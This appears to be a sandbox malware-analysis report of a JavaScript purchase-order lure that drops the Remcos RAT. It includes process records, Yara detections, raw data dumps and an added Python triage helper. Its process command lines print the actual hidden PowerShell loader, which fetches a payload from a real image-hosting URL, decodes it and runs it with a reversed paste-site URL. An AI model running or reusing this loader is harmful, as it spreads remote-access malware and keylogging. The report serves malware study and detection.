                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 67 66 4e 77 58 44 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41
                                                                                                                                          Data Ascii: gfNwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 6e 4f 30 70 44 62 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33
                                                                                                                                          Data Ascii: nO0pDb6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 41 49 42 51 42 51 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b
                                                                                                                                          Data Ascii: AIBQBQAAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwk
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 44 5a 54 47 30 30 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68
                                                                                                                                          Data Ascii: DZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6kh
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 52 6a 50 30 49 43 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41
                                                                                                                                          Data Ascii: RjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f
                                                                                                                                          Data Ascii: Dxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/



                                                                                                                                          Target ID:0
                                                                                                                                          Start time:08:00:10
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js"
                                                                                                                                          Imagebase:0x7ff6e4620000
                                                                                                                                          File size:170'496 bytes
                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:08:00:14
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js
                                                                                                                                          Imagebase:0x7ff6e4620000
                                                                                                                                          File size:170'496 bytes
                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:08:00:15
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation
                                                                                                                                          Imagebase:0x7ff63c0a0000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:08:00:15
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff704000000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:08:00:17
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                          Imagebase:0x7ff63c0a0000
                                                                                                                                          File size:452'608 bytes
                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true
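The two PowerShell command lines above (Target ID 4 and Target ID 6) carry the whole loader chain: stage 1 base64-decodes a UTF-16LE command and re-launches PowerShell hidden with the execution policy bypassed; stage 2 downloads a "JPEG" from Cloudinary, cuts out the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes the result into a .NET assembly, and calls dnlib.IO.Home.VAI with a reversed paste.ee URL as its first argument. The following Python is an added triage example written for this page; it is not part of the Joe Sandbox report or of the malware, and it uses a constructed stand-in for the Cloudinary payload and for the redacted stage-1 blob, because neither is reproduced here. The only real input is the VAI call excerpted from the Target ID 6 command line.

```python
"""Triage helpers for the two PowerShell stages recorded above.
Added example, not part of the sandbox report. All inputs below are constructed
stand-ins; the real stage-1 base64 blob is redacted on the page and the
Cloudinary 'image' is not reproduced."""
import base64
import re
from urllib.parse import urlparse

# Marker strings exactly as they appear in the Target ID 6 command line.
START_MARKER = "<<BASE64_START>>"
END_MARKER = "<<BASE64_END>>"


def decode_stage1(encoded: str) -> str:
    """Stage 1 runs [Text.Encoding]::Unicode.GetString(FromBase64String(x)),
    i.e. base64 over UTF-16LE. Decode the same way to recover the inner command."""
    return base64.b64decode(encoded).decode("utf-16-le")


def unreverse(s: str) -> str:
    """Stage 2 reverses strings (the -join (...)[-1..-n] trick, and the first
    argument to VAI) so keyword and URL scanners miss them."""
    return s[::-1]


def extract_stage2_assembly(blob: bytes) -> bytes:
    """Mirror the loader: decode the fetched bytes as UTF-8 (as .NET's
    UTF8.GetString does, with replacement characters for junk), take the text
    between the markers, reverse it, then base64-decode to get the .NET DLL.
    Unlike the loader, raise when the markers are absent instead of carrying on."""
    text = blob.decode("utf-8", errors="replace")
    start = text.find(START_MARKER)
    end = text.find(END_MARKER)
    if start < 0 or end <= start:
        raise ValueError("markers not found or out of order")
    start += len(START_MARKER)
    return base64.b64decode(unreverse(text[start:end]))


def reversed_urls(cmdline: str) -> list:
    """Find single-quoted literals that become a URL once reversed, e.g.
    '0/tBcDi/r/ee.etsap//:sptth' -> https://paste.ee/r/iDcBt/0.
    This is the cheap check behind the 'Paste sharing url in reverse order' idea."""
    hits = []
    for lit in re.findall(r"'([^']*)'", cmdline):
        cand = unreverse(lit)
        if cand.startswith(("http://", "https://")) and urlparse(cand).netloc:
            hits.append(cand)
    return hits


# --- constructed sample input (not the real payload) ---
FAKE_DLL = b"MZ" + b"\x00" * 30 + b"this stands in for the dnlib.IO.Home assembly"
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0 junk jpeg bytes "
    + START_MARKER.encode()
    + base64.b64encode(FAKE_DLL)[::-1]   # the loader expects the base64 reversed
    + END_MARKER.encode()
    + b" trailing junk"
)
INNER_CMD = "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $x"
FAKE_STAGE1 = base64.b64encode(INNER_CMD.encode("utf-16-le")).decode()

# Excerpt of the real Target ID 6 command line (arguments shortened).
VAI_CALL = "$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'MSBuild'))"

if __name__ == "__main__":
    print(decode_stage1(FAKE_STAGE1))
    print(extract_stage2_assembly(FAKE_IMAGE)[:2])
    print(reversed_urls(VAI_CALL))
```

Two points worth noting when reading the original loader against this helper. First, the line `$walled -ge 0 -and $highlighted -gt $walled;` in the Target ID 6 command is a bare expression, not an `if`: its boolean result is written to the pipeline and discarded, so the loader never actually guards the Substring call; the helper above fails closed instead. Second, the reversed paste.ee URL is passed to the loaded assembly together with the literal `'MSBuild'`, which matches the two MSBuild.exe children that follow (Target IDs 9 and 10) and the Remcos Yara hits inside the 32-bit one.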

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:08:00:43
                                                                                                                                          Start date:14/12/2024
                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          Imagebase:0x160000
                                                                                                                                          File size:262'432 bytes
                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 08:00:43
Start date: 14/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase: 0x960000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: false

Target ID: 11
Start time: 08:00:52
Start date: 14/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"
Imagebase: 0xa60000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 08:00:52
Start date: 14/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"
Imagebase: 0x6d0000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 08:00:52
Start date: 14/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"
Imagebase: 0x990000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Memory Dump Source
• Source File: 00000004.00000002.2981445405.00007FFE162E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE162E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffe162e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d082acc1527c3e05132d205091c38198fa7c5d3701235dafbb20c880880ae05
• Instruction ID: 5b8dc56b74c3730fa8ec6d5dfa1e32fa8b67ac2388a7d6d28e8ee5aff2e3d119
• Opcode Fuzzy Hash: 0d082acc1527c3e05132d205091c38198fa7c5d3701235dafbb20c880880ae05
• Instruction Fuzzy Hash: 2801A77111CB0C8FD744EF0CE451AA6B3E0FB89324F10056DE58AC3261D732E882CB41

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 4%
Signature Coverage: 6.5%
Total number of Nodes: 1759
Total number of Limit Nodes: 64
52999->53000 53001 41a4a7 53000->53001 53002 41a4fa 53001->53002 53003 412513 31 API calls 53001->53003 53002->52695 53004 41a4cd 53003->53004 53005 41a4d8 StrToIntA 53004->53005 53006 41a4ef 53005->53006 53007 41a4e6 53005->53007 53008 401eea 26 API calls 53006->53008 53406 41c102 28 API calls 53007->53406 53008->53002 53011 40698f 53010->53011 53012 4124b7 3 API calls 53011->53012 53013 406996 53012->53013 53013->52705 53013->52706 53015 41ae1c 53014->53015 53407 40b027 53015->53407 53017 41ae24 53017->52720 53019 401e27 53018->53019 53021 401e33 53019->53021 53416 402121 26 API calls 53019->53416 53021->52723 53023 402121 53022->53023 53024 402150 53023->53024 53417 402718 26 API calls _Deallocate 53023->53417 53024->52726 53027 4128c0 53026->53027 53028 406052 28 API calls 53027->53028 53029 4128d5 53028->53029 53030 401fbd 28 API calls 53029->53030 53031 4128e5 53030->53031 53032 4126d2 29 API calls 53031->53032 53033 4128ef 53032->53033 53034 401eea 26 API calls 53033->53034 53035 4128fc 53034->53035 53035->52772 53037 401f6e 53036->53037 53418 402301 53037->53418 53041 412722 53040->53041 53042 4126eb 53040->53042 53043 401eea 26 API calls 53041->53043 53045 4126fd RegSetValueExA RegCloseKey 53042->53045 53044 40dd3b 53043->53044 53044->52773 53045->53041 53047 43a600 _strftime 53046->53047 53422 43993e 53047->53422 53051 41a737 53050->53051 53052 41a69c GetLocalTime 53050->53052 53054 401eea 26 API calls 53051->53054 53053 404cbf 28 API calls 53052->53053 53055 41a6de 53053->53055 53056 41a73f 53054->53056 53057 405ce6 28 API calls 53055->53057 53058 401eea 26 API calls 53056->53058 53059 41a6ea 53057->53059 53060 40ddaa 53058->53060 53456 4027cb 53059->53456 53060->52797 53062 41a6f6 53063 405ce6 28 API calls 53062->53063 53064 41a702 53063->53064 53459 406478 76 API calls 53064->53459 53066 41a710 53067 401eea 26 API calls 53066->53067 53068 41a71c 53067->53068 53069 401eea 26 API calls 53068->53069 53070 41a725 53069->53070 53071 401eea 26 API calls 
53070->53071 53072 41a72e 53071->53072 53073 401eea 26 API calls 53072->53073 53073->53051 53075 409536 _wcslen 53074->53075 53076 409541 53075->53076 53077 409558 53075->53077 53078 40c89e 32 API calls 53076->53078 53079 40c89e 32 API calls 53077->53079 53080 409549 53078->53080 53081 409560 53079->53081 53082 401e18 26 API calls 53080->53082 53083 401e18 26 API calls 53081->53083 53098 409553 53082->53098 53084 40956e 53083->53084 53085 401e13 26 API calls 53084->53085 53086 409576 53085->53086 53479 40856b 28 API calls 53086->53479 53087 401e13 26 API calls 53089 4095ad 53087->53089 53464 409837 53089->53464 53090 409588 53480 4028cf 53090->53480 53094 409593 53095 401e18 26 API calls 53094->53095 53096 40959d 53095->53096 53097 401e13 26 API calls 53096->53097 53097->53098 53098->53087 53672 403b40 53099->53672 53103 41a7fd 53104 4028cf 28 API calls 53103->53104 53105 41a807 53104->53105 53106 401e13 26 API calls 53105->53106 53107 41a810 53106->53107 53108 401e13 26 API calls 53107->53108 53109 40dfc3 53108->53109 53109->52849 53111 40e08b 53110->53111 53112 41248f RegQueryValueExA RegCloseKey 53110->53112 53111->52878 53111->52881 53112->53111 53114 4125b0 RegQueryValueExW RegCloseKey 53113->53114 53115 4125dd 53113->53115 53114->53115 53116 403b40 28 API calls 53115->53116 53117 40e0ba 53116->53117 53117->52891 53119 412992 RegDeleteValueW 53118->53119 53120 4129a6 53118->53120 53119->53120 53121 4129a2 53119->53121 53120->52900 53121->52900 53123 40cbc5 53122->53123 53124 41246e 3 API calls 53123->53124 53125 40cbcc 53124->53125 53129 40cbeb 53125->53129 53694 401602 53125->53694 53127 40cbd9 53697 4127d5 RegCreateKeyA 53127->53697 53130 413fd4 53129->53130 53131 413feb 53130->53131 53714 41aa73 53131->53714 53133 413ff6 53134 401d64 28 API calls 53133->53134 53135 41400f 53134->53135 53136 43a5e7 _strftime 42 API calls 53135->53136 53137 41401c 53136->53137 53138 414021 Sleep 53137->53138 53139 41402e 53137->53139 53138->53139 53140 401f66 28 API calls 
